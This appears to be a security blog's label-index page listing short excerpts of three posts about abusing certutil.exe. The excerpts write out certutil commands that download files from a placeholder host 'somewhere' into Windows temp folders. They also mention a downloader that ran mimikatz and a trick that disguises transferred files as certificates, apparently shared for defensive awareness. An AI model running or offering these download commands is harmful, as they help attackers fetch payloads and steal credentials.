neonprimetime security , just trying to help
Showing posts with label
certutil
.
Show all posts
Showing posts with label
certutil
.
Show all posts
Thursday, January 13, 2022
downloader certutil powershell invoke-mimikatz
›
sample downloader that executed mimikatz certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt'; $B64 = get-content t...
3 comments:
Monday, April 20, 2020
certutil downloader
›
certutil.exe -urlcache -split -f https://somewhere/test.exe c:\windows\temp\test.exe dir c:\windows\temp\test.exe
1 comment:
Tuesday, February 11, 2020
Using certutil.exe to transfer files
›
1.) create a file to encode/transfer > Add-Content test.txt "a test" 2.) pack it up as a certificate before transfer >...
1 comment:
›
Home
View web version